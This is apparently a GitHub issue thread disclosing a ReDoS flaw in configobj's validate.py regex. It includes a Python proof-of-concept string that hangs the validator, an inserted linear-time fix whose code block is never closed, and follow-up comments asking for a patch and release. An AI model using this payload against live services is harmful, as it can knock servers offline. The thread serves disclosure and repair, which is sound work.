A ReDoS vulnerability exists in ./src/configobj/validate.py
DarkTinia opened this issue
The affected code is located in validate.py, line 660. It uses the vulnerable regular expression `(.+?)\((.*)\)`. When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the Python script below:
```python
from configobj.validate import Validator

value = "aaa"
i = 10
# The check string: NUL bytes, one ')' and then a long run of '(' so that
# (.+?)\((.*)\) never matches and backtracks over every candidate '('.
attack = '\x00'*16510*i + ')' + '('*16510*i
vtor = Validator()
newval1 = vtor.check(attack, value)  # check(check_string, value): hangs on the pattern above
```
I see many projects referencing this file; when run server side, there is a possible DoS. It would be my pleasure to provide a patch to repair the ReDoS vulnerability.
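As an added example (not configobj's own code and not the fix in #236), here is the pattern quoted in the report beside a backtracking-free splitter that returns the same (name, args) pairs in linear time; `re.DOTALL` is assumed so that `.` matches every character, and the helper names are hypothetical:

```python
import re

# The pattern from the report: the lazy (.+?) tries every '(' in turn, and for
# each one the greedy (.*) re-scans the rest of the string looking for a ')'.
# When no ')' follows, that is O(n) work per candidate '(' -> O(n^2) overall.
VULNERABLE_FUNC_RE = re.compile(r'(.+?)\((.*)\)', re.DOTALL)  # DOTALL assumed


def split_check_regex(check):
    """Reference behaviour of the pattern above: (name, args) or None."""
    m = VULNERABLE_FUNC_RE.match(check)
    return (m.group(1), m.group(2)) if m else None


def split_check_linear(check):
    """Backtracking-free equivalent (hypothetical helper, not configobj's code).

    The regex picks the first '(' that is preceded by at least one character
    (lazy .+?) and the last ')' after it (greedy .*). Two single scans with
    str.find and str.rfind give the same answer in O(n), whatever the input
    looks like, so a hostile check string costs no more than a benign one.
    """
    open_at = check.find('(', 1)          # first '(' at index >= 1
    close_at = check.rfind(')')           # last ')' anywhere
    if open_at == -1 or close_at < open_at:
        return None                       # no "name(...)" shape present
    return check[:open_at], check[open_at + 1:close_at]


# Constructed sample check strings in the validate.py style, plus some
# malformed ones, to show both functions agree (nothing here is pathological).
SAMPLES = [
    "integer(0, 100)",
    "option('a(b', 'c')",
    "string",
    "f(x))",
    "f)x(",
    "(a(b)",
]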
Opening a pull request that patches this vulnerability would be appreciated. Thank you.
Is this security hole fixed?
CVE-2023-26112 appears to have been assigned for this issue.
Just pinging: has any PR fixed this CVE?
Opening a pull request that patches this vulnerability would be appreciated. Thank you.
@robdennis I opened a PR, #236. Please let me know if you need me to change anything.
Any update on this one? Thanks
A new release including a fix (#236 ?) would be appreciated.
Dear https://github.com/DiffSK Team, please push a new release, containing these changes. Thank you for the prompt support!